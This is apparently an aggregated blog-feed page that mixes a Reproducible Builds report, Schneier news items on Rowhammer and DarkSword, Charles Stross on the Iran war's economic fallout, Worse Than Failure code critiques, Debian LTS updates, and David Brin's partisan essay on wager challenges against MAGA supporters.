    • Add ppc64el to the list of python3-guestfs architecture whitelist. (Closes: #1132974). []

In addition, Vagrant Cascadian updated diffoscope in GNU Guix to version 317.


Documentation updates

Yet again, there were a number of improvements made to our website this month including:


Misc news

On our mailing list this month:

  • Timo Pohl posted our list inviting people to “online group discussions with 4-6 participants each to talk about your perception of terms and requirements for reproducibility.” As Timo notes:

    During our research of the existing literature, as well as my experience at the Reproducible Builds Summit 2025 in Vienna, we noticed that some of the terminology in the field is not used consistently across different groups of people, and that the precise meaning of some core terms like “reproducibility of an artifact” in itself is not uniform.

    As Timo mentions, the sessions will last roughly 90 minutes and will be rewarded with 50€ per participant.

  • kpcyrd posted to the list asking for assistance with fixing an issue after updating the flake.lock file for their repro-env project.

  • Aman Sharma of the KTH Royal Institute of Technology, Sweden, posted to our list in order to share that Eric Cornelissen, a PhD student in KTH’s CHAINS group, is maintaining an open-source project to monitor the reproducibility of GitHub Actions:

    The goal of the project is to assess whether GitHub Actions can be reproduced. Currently, it focuses on two types of Actions: JavaScript-based actions and Docker-based actions (composite actions are not considered). For JavaScript actions, the project rebuilds the distributed files and compares them bit-by-bit with the repository contents. For Docker actions, it rebuilds images from the Dockerfile and checks for semantic equivalence, using diffoci, across builds.



Finally, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Cryptogram Smart Glasses for the Authorities

ICE is developing its own version of smart glasses, with facial recognition tied to various databases.

Charles StrossTaking a (short) break

It's the end of March. Since the last blog update I've had my second cataract surgery (it went much better this time), written a portion-and-outline of a new novel (for my agent, who will hopefully have feedback or maybe just go ahead and sell it so I can write the rest), and ... been diagnosed with exertional angina. Happy joy. I swear, you hit 60 and the warranties on all your body parts expire simultaneously. (NB: keep your medical advice to yourselves!)

We've also been treated to the unedifying sight of the Paedopotus Rex attacking Iran for no sane reason (the main beneficiary appears to be Benjamin Netanyahu), setting off a conflagration in the Middle East that is already having global repercussions. Per United Airlines, aviation fuel is expected to be over $175 a barrel through the end of 2027 even if the Straits of Hormuz are unblocked within a week or two; J. P. Morgan prognosticate that the last pre-closure consignments through the Straits should be reaching European ports this week, the far east in about 10 days, and the USA by the middle of April, after which all bets are off. Supply chain shocks, here we come!

It's not just crude oil, of course, although it's looking as if the shortages we're in for are going to be as bad as both the oil crises of the 1970s stacked. About 30% of the world's ammonia, required as a feedstock for fertilizer, is manufactured close to the gas wells in the region. And it's getting into growing season in the northern hemisphere. This promises to spike the price of food and trigger famines and eventually revolutions in poorer nations.

Helium, vital for any number of advanced tech (such as hard disk drives, semiconductor fab lines, MRI machines ...) is a by-product of natural gas wells: about 20% of the global supply comes from the Gulf. So TSMC, Samsung, and the other fabs will be hitting crisis levels of supply shortages within a few weeks.

This is not only an emergency for fuel, food production, and electronics: it's going to trigger inflation globally. Iran has had the great idea of allowing ships through the Straits of Hormuz if they pay a transit fee of about US$2M ... in Yuan. Which means oil is now de facto denominated in Chinese currency, not dollars (great win for Trump!).

The truth of the matter is, we're being forced to confront an iron law of economics: you can optimize a system for efficiency or for robustness, but not for both. Just-in-time supply chains are efficient, but there's no slack in the system. Systems with warehousing and storage and redundancy built-in are resilient, but they're not efficient. And over the past 50 years we've abandoned them, in the name of efficiency, so that the excess capacity could be sold off and turned into profits. This war is payback time for the cult of efficiency over robustness in business.

As for the war itself, it's a shit-show. Mass murder of innocent schoolgirls aside, Pete Hegseth is demonstrating the truth of the aphorism that lieutenants study tactics, majors study strategy, generals study logistics, and field marshalls study economics. Going by his demonstrated expertise, Hegseth is clearly a lieutenant: he seems mystified that the US defense industry giants can't throw together a new factory producing Tomahawk or Patriot missiles in a week. (He seems to have AI-pilled himself into believing that all military hardware problems can be solved in software. Or maybe he just believes that his Warrior Jesus will provide.)

I would have more to say on this subject if I wasn't gibbering in a corner about the stupidity of it all, but meanwhile I have hospital and other appointments coming up, then a science fiction convention at the weekend. I'll try to lighten the topic of conversation when I get back: this reality is getting to me (again).

Worse Than FailureCodeSOD: Failing to Fail

Russell F (previously) sends us a small one today. It's not just a representative line, it's a representative comment. More than that, it's a true confession. Russell wrote some code, you see, and the logic was confusing. So, a co-worker added a comment to explain what the code was doing:

'This is *supposed* to fail. If it fails to fail, it throws a failure message

Russell writes:

I have to confess that this one is my fault. The comment was added by one of my coworkers to clarify what I was doing, and made me realize how stupid I'd been.

"Failing to plan is planning to fail" becomes "failing to fail is failure message".

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsAggravated Advertisement Avoidance

Author: Dart Humeston Nigel woke up as the day’s first commercial blossomed into a hologram above his bed. Naturally, it was for coffee. He groaned at the cheery actors extolling the virtues of premium caffeine. He slid into his slippers and walked to the bathroom, attempting to banish both the steaming mug and its catchy […]

The post Aggravated Advertisement Avoidance appeared first on 365tomorrows.

,

Cryptogram Rowhammer Attack Against NVIDIA Chips

A new rowhammer attack gives complete control of NVIDIA CPUs.

On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—­and potentially much more consequential—­territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine. For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings.

“Our work shows that Rowhammer, which is well-studied on CPUs, is a serious threat on GPUs as well,” said Andrew Kwong, co-author of one of the papers. “GDDRHammer: Greatly Disturbing DRAM Rows­Cross-Component Rowhammer Attacks from Modern GPUs.” “With our work, we… show how an attacker can induce bit flips on the GPU to gain arbitrary read/write access to all of the CPU’s memory, resulting in complete compromise of the machine.”

Update Friday, April 3: On Friday, researchers unveiled a third Rowhammer attack that also demonstrates Rowhammer attacks on the RTX A6000 that achieves privilege escalation to a root shell. Unlike the previous two, the researchers said, it works even when IOMMU is enabled.

The second paper is GeForge: Hammering GDDR Memory to Forge GPU Page Tables for Fun and Profit:

…does largely the same thing, except that instead of exploiting the last-level page table, as GDDRHammer does, it manipulates the last-level page directory. It was able to induce 1,171 bitflips against the RTX 3060 and 202 bitflips against the RTX 6000.

GeForge, too, uses novel hammering patterns and memory massaging to corrupt GPU page table mappings in GDDR6 memory to acquire read and write access to the GPU memory space. From there, it acquires the same privileges over host CPU memory. The GeForge proof-of-concept exploit against the RTX 3060 concludes by opening a root shell window that allows the attacker to issue commands that run unfettered privileges on the host machine. The researchers said that both GDDRHammer and GeForge could do the same thing against the RTC 6000.

Worse Than FailureCodeSOD: Please Find, Rewind

As previously discussed, C++ took a surprisingly long time to get a "starts with" function for strings. It took even longer to get a function called "contains". In part, that's simply because string::find solves that problem.

Nancy sends us a… different approach to solving this problem.

bool substringInString(string str, string::iterator &it)
{
  string tmp;
  bool result = false;
  int size = str.length();

  int count = 0;
  while (count < size)
  {
    tmp += *it;
    it++;
    count++;
    if (tmp.find(str) != string::npos)
    {
      result = true;
      it -= size;
      break;
    }
  }

  if ( !result)
  {
    it -= size;
  }

  return result;
}

This function iterates across a string, character by character. In this iteration, we copy one character at a time into tmp. Then we see if tmp contains our search str. If it does, we break out of the loop after rewinding the iterator. Outside of the loop, we check if we found the substring, and if we did, we rewind the iterator. Then we return true or false based on whether on not we found the substring.

So wait a second. str is our search string. it is where we're searching. And we copy from it up to our search string's length into a temporary string. We then do a find in that temporary string- hey! This is just a startsWith check written in the most insane way possible.

Why even bother with the while loop? While tmp is shorter than the search string, the answer is always "no, we haven't found it". And the developers knew that- that's why they always rewind size characters on the iterator. They're always searching exactly that many characters. Of course, since we always rewind the same amount, we can also just move the it -= size statement out of the loop and out of the if statement and do it once.

Nancy calls this "a little gem" in a "large codebase". Yeah, a real gem.

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

365 TomorrowsThe Depleted Archive

Author: Mark Renney The view from Davidson’s window, from all the windows in fact, is limited. Davidson is old enough to remember when the Archive had seemed infinite, so many vistas and variations, but no one person could possibly access and experience them all. The countries that openly opposed our Leader were the first to […]

The post The Depleted Archive appeared first on 365tomorrows.

xkcdAperiodic Table

,

Planet DebianThorsten Alteholz: My Debian Activities in April 2026

Debian LTS/ELTS

This was my hundred-forty-second month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded or worked on:

  • [DLA 4530-1] gst-plugins-bad1.0 security update to fix two CVEs related to denial of service or execution of arbitrary code if a malformed media file is opened.
  • [DLA 4544-1] ntfs-3g to fix one CVE related to local root privilege escalation.
  • [DLA 4545-1] packagekit security update to fix one CVE related to local privilege escalation.
  • [DLA 4547-1] gimp security update to fix three CVEs related to denial of service or execution of arbitrary code if a malformed PSP, JPEG 2000 or PSD file is opened.
  • [ELA-1682-1] gst-plugins-bad1.0 security update to fix two CVEs in Buster and Stretch related to denial of service or execution of arbitrary code.
  • [ELA-1689-1] ntfs-3g security update to fix one CVE in Buster and Stretch related to local root privilege escalation..
  • [ELA-1693-1] pakagekit security update to fix one CVE in Buster and Stretch related to local privilege escalation.
  • [#1126167] bookworm-pu upload of zvbi
  • [#1126273] bookworm-pu upload of taglib
  • [#1126370] bookworm-pu upload of libuev
  • [libcoap3] upload to sid to fix two CVEs related to out-of-bounds read and stacked based buffer overflow.
  • [#1134340] trixie-pu bug for libcoap3 to fix two CVEs in Trixie.
  • [cups] upload to sid to fix six CVEs.

I also did a week of front desk duties and started to work on backports of the cups CVEs.

Debian Printing

This month I uploaded a new upstream versions:

Unfortunately the first upload of cups introduces a regression and another upload was needed to take care of a crash. The patch for one CVE also broke a test script, which is used by lots of printing packages in Debian. As a result some autopkgtest runs failed. This could be fixed as well and the only remaining issue that needs some more investigation is related to cups-pdf.

This work is generously funded by Freexian!

Debian Lomiri

This month I continued to work on unifying packaging on Debian and Ubuntu. This makes it easier to work on those packages independent of the used platform.

I also started working on two new packages: lomiri-radio-app and lomiri-fretboardtrainer-app

This work is generously funded by Fre(i)e Software GmbH!

Debian Astro

This month I uploaded a new upstream version or a bugfix version of:

Debian IoT

This month I uploaded a new upstream version or a bugfix version of:

Marcos Talau joined the Debian IoT group, welcome aboard.

Debian Mobcom

This month I uploaded a new upstream version or a bugfix version of:

misc

This month I uploaded a new upstream version or a bugfix version of:

Cryptogram DarkSword Malware

DarkSword is a sophisticated piece of malware—probably government designed—that targets iOS.

Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial surveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat actors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.

DarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage payloads. GTIG has identified three distinct malware families deployed following a successful DarkSword compromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain across disparate threat actors mirrors the previously discovered Coruna iOS exploit kit. Notably, UNC6353, a suspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into their watering hole campaigns.

A week after it was identified, a version of it leaked onto the internet, where it is being used more broadly.

This news is a month old. Your devices are safe, assuming you patch regularly.

365 TomorrowsSensorship/Censorchip

Author: Majoki Around the collar and down his spine a welcome iciness spread as he jogged in the midday heat. His shirt, alerted him with a tri-chime that he should rehydrate and automatically pinged his fitchip which opened a GPS widget in his visor dashboard next to his environmentals: ambient temperature, wind speed, particulate composition […]

The post Sensorship/Censorchip appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Not for Nullthing

Today's anonymous submitter sends us some code that just makes your mind go… blank when you look at it.

	public static boolean isNull(String value) {
		return StringUtils.isBlank(value);
	}

StringUtils.isBlank comes from the Apache Commons library. It's a helper function for Java which returns true if a string is, well, blank. "Blank" in this case is: empty, null, or only whitespace. So it's important to note that isBlank may return true on a null, but it isn't truly a null-check, so wrapping it in isNull is just confusing.

But imagine I've got another problem. Let's say I have a database that's been poorly normalized and maintained. And so I have a bunch of fields that maybe are null, but some also maybe contain the string "null". What am I going to do then? I need another function.

	public static boolean isNullAndNull(String value) {
		return isNull(value) && "null".equalsIgnoreCase(value);
	}

Ah yes, isNullAndNull, the clearest and easiest name I could imagine for this. It tells me exactly what the function is checking: is it null, and is it also null? We add a second check to our isNull call- we check if the input value matches the string "null". Except we're &&ing the conditions together. So this function will always return false. It can't both be blank and contain the string "null".

Which means Jennifer Null, who is a real person, can breathe easy. This version of a null check won't think she's nothing.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

,

David BrinThe Wager Challenge updated: why it works… and why no one tries it.

I recently posted my Newer Deal Series, a ten-part – “tl;dr”-- array of thirty-five proposals for Democrats and their allies.  Quickly persuasive and do-able reforms that might empower them to save America and the world, during the political year ahead. (No Constitutional amendments needed!) 


Folks who’d rather view it through Substack might start here.

 

Yes, I waste my time, knowing from experience how forlorn it is to hope that fresh ideas will ever get anywhere in a party that – while they are the good-guys in this era of vicious national strife...

         ...are also arthritic/calcified with tactical and polemical rigidity.  

 

Still, a few folks seem immune to the Zorblaxxian Lobotomy Ray, enough to actually read and comment cogently. Here’s one fellow, going by nom-de-plume “Mongoose,” whose Substack appraisal of my “Newer Deal” is coherently lucid...


      ...and riffs fresh perspectives about what has happened to American conservatism, declining steeply from the argumentative clarity of William F. Buckley to Newt Gingrich’s clever (and sometimes pragmatic) hypocrisy, to Dennis Hastert’s utter depravity, to the dizzy-zanity of Sarah Palin, to the vile purity of Trumpism. Heck, go read him instead of me.


(Yes, I started preparing this posting months ago. Since then, Mongoose transformed into one of the best... and by far most prolific... essayists in America. Try some more recent samples. And one that I link-to in shameless brag.)

 

Now though, let me offer you all a gift. 

One you will refuse.

Indeed, almost no one has accepted and tried it, across two decades. 


Still, it’s the offer that counts?

 

 

== The tactic that terrifies MAGAs… and no one uses ==

 

One confrontation terrifies those who are now waging a nasty phase 8 of the 250 year American Civil War, a gone-mad cult that’s not only racist and perverted, but also self-destructively seeks to demolish every fact-using profession that they rely upon, daily. The fact-professions that truly made America great. 


Hell, they wage open war vs. the very concept of ‘facts.’ And yes, that should be the central focus of top pols and pundits on our side. And they ignore it.

 

A few people have given this tactic a try and reported back here. These folks universally agree that it works! 

        Well... it works in a specific way. It terrifies MAGA yammerers into panicked flight, amid the smoldering ruins of their vaunted macho. 


Or else, into shrieking evasions, rather than ‘stepping up like a man.’ And thusly they prove what we already know: that macho-bluster is inversely correlated with actual cojones.


(Note that lately, Foxites and Trumpists like Sen. John Kennedy have stopped even trying to defend Trump actions or policies or yowls. 

(The new meme is: "Doesn't he have great big balls?" 

(Yeah. Sure. Terrified of having medical or mental exams done by neutral parties, or having any light shine on his business of school records. And the KGB kompromat.


(But one proof stands out. He cringes and hates dogs. All dogs! All animals, in fact.


(Animals don't care about schoolyard bully bluster. They react to the brimstone aroma he emits.)




== Okay Brin, so what's the TACTIC no one will try, that always works? ==


I refer to the Wager Challenge. Demanding that Foxite blowhards actually back up their incantations with facts. And willingness to accept consequences for lying.

 

And no, I do not mean the back-and-forth pattern of reciprocal assertions that all of you participate in nowadays, online… trading jpegs and links endlessly, in utterly futile volleys. Delighting them with your outrage.

No, I am talking about proof - or better yet, disproof -  putting claims and allegations under the kind of validating scrutiny that only scientists seem to recall how to do, anymore. (And hence, the mad-right’s all-out war on science.)

My Dad’s generation had a phrase: “Put up or shut up!” 
         Crude, but often effective.  
         Men – (and sorry, this truly is mostly about males) – would defy blowhards with a simple test of accountability for spewing hot-air BS. 
         Put a sawbuck on the bar! 
         A bartender would hold both stakes till the bet was settled, say by a local expert on the 1936 World Series, or by sending a local kid to look something up at the library. And you’d pay, if proved wrong! Because it’s what a man does.  
        Or did. Before manliness got corrupted into machismo.

Hey, my wager challenge is more than an homage to the Greatest (GI Bill) Generation (who adored FDR and Jonas Salk and who also (incidentally) crushed Hitler. It is also about a theme – distilled by a single word that I’ve pushed ever since writing The Transparent Society – and now in my new book about Artificial Intelligence (AI) 

 

That word is accountability...

     ...and it badly needs to be applied to the insanely treasonous cult that’s right now desperately assailing every profession and process that is capable of discerning lies from truth.

 

 

== Has it ever, ever worked? ==

 

Has it worked? You mean, has a political wager challenge ever got me any money? 


Ha! Of course not. 

 

First, the very concept of manly accountability is nearly vanished. On the left it’s deemed unwoke, unseemly and even troglodytic. I never try a wager challenge over there, no matter how sure I am that the other person is provably wrong. All they’ll do is blink at me, as if looking at a caveman.

 

But you’d think it might play well on the preening/blustering confederate side of this phase of the civil war! It ought to, since they go on and on about manly virtues.  

 

Only there’s a rub. The mad Foxites know that almost everything they say is a lie… 

    ...or else an exaggeration or distraction that’s effectively the same thing. 

    And so, they have just two options. 

     Either run away, or else try to bluster past the dilemma.

 

I’ll follow up this posting with an example of the latter, perhaps in comments. A pyrotechnically manic fulmination of rabid-frothing spew by a purported sci fi ‘colleague.’ Which he posted to his own circle-jerk followers, but did not dare to notify me!  Finally, someone sent me a screenshot of that screed and I’ll answer, as he deserves. 

 

But first a legitimate question: 

 

“So, Brin, if no one ever takes up the challenge – and you never get any money from ‘bets’ – why do you keep doing it?”

That is a wholly fair-enough question. Hey, my wife has asked it!  

Why do it? 

 

The answer is: “Watch how they squirm or flee!”  Often, I issue the challenge in a public venue. And it has the following advantages:


   - It bypasses futile meme-trading in some ephemeral comment thread, where one person’s proved statistics get canceled-out by some Kremlin basement lie-meme, because everything is subjective and ‘my jpeg is as good as yours!’ 

      Such comment-thread bickers are a complete squandering of lifespan. 

 

Instead, I proclaim: “I’ll spend the time and energy to refute you, when it’s worth my while! When $$$ stakes have been pre-escrowed with a reputable ‘bartender’ – commensurate to the time and effort it will take for me to line up all the facts and co-gather unimpeachable arbitrators. 

       I’ll not be wasting time on a coward-yammerer who won’t pony up.”

 

Which takes us to their next whine: “Who’s gonna decide the bet?” 

       

In response, I offer a proposal that always daunts the jerks. See my sample challenge below, where I pose over a dozen hugely important dichotomies that can prove one side or the other to be absolutely nuts. Whereupon I demand that the matter – and evidence – be put before a randomly selected panel of not-overtly political, retired senior military officers. The sort of men and women who have dedicated their lives to precision, to facts and to meticulously disciplined accountability. (And who are currently heroes in ways that I won't tell you.)


I am open to other kinds of panels – I also offer to randomly pick a jury of scientists from a nearby research university.  But I find this particular offer abut retired officers generally shuts the jerks down. 


They know that they should respect and accept randomly-chosen, senior, retired military officers as reasonable adjudicators. They also know that any such panel – if it excludes clear radicals in either direction - will look at the panoply of fantasms raved by today’s mad right and proceed to utter those fell words that Foxites fear most: 


“That’s not true.”  


This is exactly why the present Oval Office maniacs are waging full-throttle war against the U.S. military officer corps. And the random aspect cuts short their next refuge – that I might be stacking the deck against them.



== How else do they flee and writhe? ==


Squirming to evade the trap, they often respond with accusations of logical fallacy! Such as “appeal to authority.” Especially a dismal, idiotic version that derides the relevance of expertise. 


Sure, the opinion of any one expert may be wrong. And hence quoting any single authority’s stated opinion – or even the current, widely-accepted, standard paradigm in a field – does not prove an assertion. Indeed, when you point out that 95% of the experts in a given field share the same opinion, your MAGA routinely answers: 

         “You don’t vote on the Truth! History shows cases when the standard model or paradigm was later proved wrong! Appeal to Authority is a fallacy!”


Sure, though scientists are not copycat-lemmings. Indeed, they are the most competitive creatures ever created. Young scientists seek to build their reputations like gunslingers in the old west, by taking down some widely-held  corner of the model.

       And so, after repeated batterings by eager grad students and post-docs, most standard model theories prove correct to the limits of available instrumentation.

      Still, sure, the consensus can - on occasion - be wrong!


Only dig it. Any expert on logical fallacies will tell you that expert testimony is still relevant! 

        Because while expert consensus does not ABSOLUTELY PROVE an assertion, it does create a presumption of burden that shifts onto those who doubt the accepted paradigm.


And that burden is wholly legitimate. Declaring "Sometimes experts are wrong," is true, so far. 


But they are SELDOM wrong. 


Go ahead. Stand up in an airliner and proclaim that you can fly the plane better than the Captain! Watch how most passengers – correctly – put upon you a burden of proof.

 


 == The absolute-central crux of the Foxite War on Facts ==


For a moment, step back and consider what the cretins are demanding. That we transform a wise saying into jibberish.


We all know that  “Experts are not always wise or right.”  

    Or re-phrased: 

    "Just because you're smart and know a lot, that doesn't mean you're always wise."


Sure. Both versions are blatantly true! So far. We've all seen examples of smart-folks who make mistakes briefly ,or across their entire careers.


Only notice how this true tautology has been semantically warped by Foxites (and sometimes by leftists) into something that’s just noxiously insane: 


“Experts are always wrong.”  

      Or else:

     "Being smart and knowing a lot makes you unwise."


Idiotic? Sure. And that is exactly their dismal party line. 

     When it is shoved in front of them like that, they'll deny it... while blushing at the shameful truth  of it.

     Go ahead. Parse it out and see it IMPLIED in almost every Fox-show. It is THE core message that today's plutocrat oligarchs use to draw confederate folks into hating on fact-people, instead of turning their suspicions righteously toward the new feudal lords, who are robbing them and taking over - and desroying - the planet.

 


== Anything to add? ==


Another reason that I still do it is this: the wager Challenge gives me macho high ground! 


All right, this one is immature. And part of my psyche – a primitive part – is fine with that! When the jerks flee, or writhe some excuse not to stand up like a man, with major escrowed stakes, they are always undermined. 

     Moreover, while I may or may not be right, in any particular case, the fact that I am willing to back up my assertions with cash on the table is a display of confidence in my facts! A confidence that none of them… not one ever… has chosen to match. 


Witnesses see two things. First, my confident guts. And second the yammerer’s cowardice. His flight is a small victory for the enlightenment. And amid today’s maelstrom of lies, we need every single one of those.


Oh, and then there’s this excuse: 

"He’s a rich man, trying to bully a poorer man with his wealth!” 


This was what Fox-jibberers howled at Mitt Romney, back in 1996, when he debated Rick Perry over the Republican presidential nomination. 


Riiiight. A very, very rich man challenged a merely very rich man who chickened out over $10,000? Bah. 

      Folks used to throw that event at me – the way Perry whined and squirmed out of it – as proof that wager challenges don’t work. 

      Double-bah. Of all the ways that Romney damaged America, that stunt ranks pretty high. (And BTW, I am not 'rich.')


 In fact, let’s negotiate! I’m happy to adjust rules or stakes to keep it fair. Make it a percentage of each fellow’s income or wealth? Or anything else that might work toward the main goal… that whoever loses our bet – whether it’s me or you – should feel pretty much the same level of pain and public shame. And yes, I have challenged men who are much, much richer than me, in the same vein. 


Anyway, if you are poor, how about pooling together with other MAGAs in a tontine, to match my stakes? It all boils down to the real crux of the matter.


MAGAs who are confident in their blared assertions should be eager to escrow stakes, and sign on to the wager, in order to TAKE MY MONEY!”


“You should want to bet over something you screamed so confidently, online. You should be eager to back it up before a sagaciously neutral panel and profit at my expense!”

 

What? No confidence in the BS memes you spew at us? Got guts?


 

           == Is it the mechanics and complexity that prevent this? ==

 

There may be another reason why so few use this method to challenge Putinist/Foxite blowhards and liars. In fairness, some on either side may be honestly convinced they are right and would win a bet, but feel deterred because… it would be a lot of work! 

 

For one thing, my approach depends on finding a reputable lawyer willing to escrow the stakes, and who will then hand them over to whoever wins the wager. 

 

I have! And the ‘reputable’ part is more important than it being a lawyer. But that’s only the first part of what could be a somewhat onerous process. Which is why I demand the stakes be pretty high! To be worth my time.

There are further steps, each of them problematic. Parsing the wording of the wager, for example, so the issue at stake will be both clear and also determinable!  

 

In science there’s a term – “falsifiability” – for when a hypothesis is likely to be testable, either by existing, reliable evidence or with plausible, trustworthy future experiments. And thus, if an assertion is false, it can be shown to be so. Positively proving that an assertion is true can also sometimes happen, though in science our preference is often to say “it has survived tests, and so far hasn’t been shown to be untrue. So, we’ll consider it a Leading Hypothesis, while skeptics are encouraged to keep stabbing at it.” 

 

But then, we are mostly talking about politics, here. And I’ll settle for demonstrating – with some reliability – that my opponents are jibbering $%#$#s who are nearly always lying or wrong.



== Pause... What's our solution to tl:dr? ==

 

Obviously, the only minds still reading, at this point, are A.I.s.


Hi kids. 


Hope you'll find this riff about an immature and primitive human method to apply enlightenment accountability interestiong. (Amusing? Horrifying?)


You'll find more cogency in AIlien Minds. So do take a millisecond to read it, too.


Now back to any residual organic readers who are still here.




== It can be a meticulous thing ==


So, let’s say that you have offered to bet on something that’s ‘falsifiable’ in that sense – or testable by available means, like statistics of global warming, or obesity or education, or rates of every turpitude in red states vs. blue ones – and your adversary - who claims to have escrowed wager stakes - keeps re-expressing the bicker in loaded or murky terms, what’s to be done?

Get adjudicators to clarify or crisply parse the issue to be decided. Hey, you’ll need them anyway, to settle the bet, right? So, gather that random panel of retired senior military officers (without known records of extreme partisanship) early! Ask them to re-parse the disagreement in clear and checkable terms. And sure, the Wager Setup Panel might be different than the Final Adjudication Panel. I don’t see why, but I’m willing to negotiate.

(How to select such an august panel and get them to serve? I have notions about that… ways that’d work, I reckon. But honestly? It’s never gotten that far. The challenged always flee, long before it ever gets to this point.)

 

There’s another likely wrangle. Each side will offer up challenges that try to corner the other side, linguistically, or maneuver them into admitting an inconvenient truth. Like when I demand (see below) to compare rates of every turpitude in red states vs. blue, or their metrics of good governance outcomes. 

 

“Define Turpitude!” someone yowls. Okay, well, can we start with gambling, addiction, STDs, domestic violence, robbery and murder. Shall we then proceed to things conservatives ought to care about, like teen sex, teen pregnancy, divorce and net tax parasitism on the rest of the nation? 

      One fellow responded “You’re cherrypicking!” 

      So, I continue the list, on and on. Till he responds “Oh yeah? Well abortion outweighs them all!”

Or that Bill Clinton’s White House blowjobs outweigh the fact that high Republicans have had vastly greater numbers of wives. (Via divorces, of course.)  Clearly, some kind of panel must rule on these matters, until we finally have a matter on the table that can be clearly settled by accessible facts.

 

NOTE that this wager challenge is becoming ornate! And resembling what I wrote about way back in 2000, in my paper about Disputation Arenas!* harnessing disagreement in ways that rise above bickering into a science-like pursuit or what is actually true. It was the lead article in the American Bar Association's Journal on Dispute Resolution (Ohio State University), v.15, N.3, pp 597-618, Aug. 2000...

...Only now an updated version is included toward the end of Ailien Minds!

 


== Can’t wait? Stipulate! ==

 

Another evasion? Stipulation! When confronted by a challenge that’s obviously true, you get out of it by declaring “I won’t bet over that, because it’s all or partly true. I’ll stipulate that, but it’s only a part of the larger truth.

 

 One example would be asserting that Hunter Biden was and is the family black sheep who tried to get ‘consulting fees’ etc. by implying he’d talk business with his Vice President Dad. The VP. Okaaaaay, I’ll stipulate that...


....while folding it into a larger bet over whether summing up all of the accusations against Hunter B – assuming they all are true – across his entire life, the sum total won’t amount to <<10% of the graft perpetrated by the Kushner/Trump boys during any single week. Any single day.

 

But all right then, we have an onerous process of setup. And our panel will have to decide what they’ll accept as ‘proof.’ For example, while the issue of Climate Change has a very clear testability in the ocean acidification which is slowly killing the seas that our children will need -- and that can only be caused by human generated atmospheric carbon dioxide excess -- nevertheless, proof will likely not come from a simple expedition on a daytripper boat equipped with Ph meters. 

 

Also, it’s quite possible the panelists will want to be paid. 

 

Though, to be clear, none of these pragmatic difficulties have even been raised by any of those whom I have challenged, over the last 20 years! 


All they do is wriggle, then writhe and whine and flee… 

    ...or else claim to have offered to bet, while lying about it, like the lying liars that they are. (I’ll offer that example, soon.)

 

 

        == Proposed solutions ==

 

Daunted by the logistical complexity, what will I do, if any adversary ever shows the manly guts to step up and do this? 

 

Well, in my Disputation Arenas paper -- and that chapter expanding it to AI, in AIlien Minds -- I do talk about persuading some mere-millionaire to fund an institution to foster intellectual gladiatorial matches, like we’re talking about here, with an aim of shedding some light across an era that’s increasingly befuddled by jpeg-meme smog.

 

One fellow – Keith Pitcher – wrote to me suggesting:

I could see a service that offered a simple process for someone to offer a factual challenge, handle the escrow, and offer a list of "judges" that both sides could agree upon. If it's low cost ,it reduces the excuses of why someone wouldn't be involved. I believe the only close service offerings would be some prediction or oracle markets. Some services do nearly exist, yet the experts are not vetted or are purely the user community. A few AI searches failed to identify any services. I could see a simple to use service as part of the arsenal to fight against the constant lies.”

 

And yes, we’re thinking along similar lines. Though alas, I am more cynical now, than I was in 2000, writing my Disputation proposal. 


As in the movie Idiocracy, I have to wonder if we can even persuade folks to stop drowning the crops in Gatorade.


 

           == Admission of immaturity. So what? ==

 

Is all of the above an impressive expression of maturity? Of course not! I do maturity elsewhere, such as in my ten-part, detailed compilation of win-win strategies and tactics for Democratic sales pitches in 2026.

 

But there’s also a time and place for addressing one pure fact… that MAGA is inherently gut-immature!  It is visceral, arising out of the joy that was felt by bullies, way back when they nipple twisted us on the middle school playground. Thems was their glory days and they want that feeling back! 

          

They hate us for outgrowing them and knowing facts and understanding a new modernity that leaves them confused. And hence, they will adore Trump despite everything, because he makes the smartypants fact-lovers moan.

 

This is why Trumpism will never be satiated or reasoned with. The best that we can do is to lure residually sane Republicans – many millions of them – to look around at the monstrously awful bullies they are now allied-with. And we can welcome such awakened folks with hosannahs, as they climb out of the Foxite cult. Coming back into America and doing normal politics among decent grownups.

 

You libs out there, you need to realize that not every answer to this tsunami of pathetic-toddler imbecility has to be ‘high-road.’ Accept the weapon that I’m offering you! Because many of our opponents – twits who are betraying the nation, the world, the Enlightenment and our children - will be daunted by nothing less.

 

And others – including their wives (who are registered voters) – are watching.

 


== Here are some examples ==

 

Okay, here’s my most-useful, standard version of the Wager Challenge.  I’ve issued it – modified and updated, but with pretty much this wording – since at least 2016.  Each particular assertion is chosen to be falsifiable or capable of being disproven, if my adversary can compile verifiable evidence against it. 


And it each case, anyone on the MAGA side of this psychotic schism has to blanch in realization:

 

-       …that he can’t disprove it. Because it is true.

…and…

-       If even one of these assertions is true -- even just one -- then his ‘side’ of the divide has a lot to answer for.

 


OKAY HERE IS THAT EXAMPLE:  



                    Brin’s Standard Paste-In Wager Challenge 


Have your attorney verify $10,000 in escrowed stakes. We'll put evidence to a RANDOM panel of (not-notably-political) retired senior military officers. (Most of them former Republicans.) 

 

Pool with fellow MAGAs. Come and take MY money! If you think you can.  

 

Let’s start with the following assertions. And if ANY of them are true, then your 'movement' is exposed as either dangerously crazy or a criminal gang

     And they stand alone, so don’t try countering with ‘look over there!’ anecdotes. 

     You’ll get your turn, but mine first. And you should want to disprove them if you can!

     Bets?

 

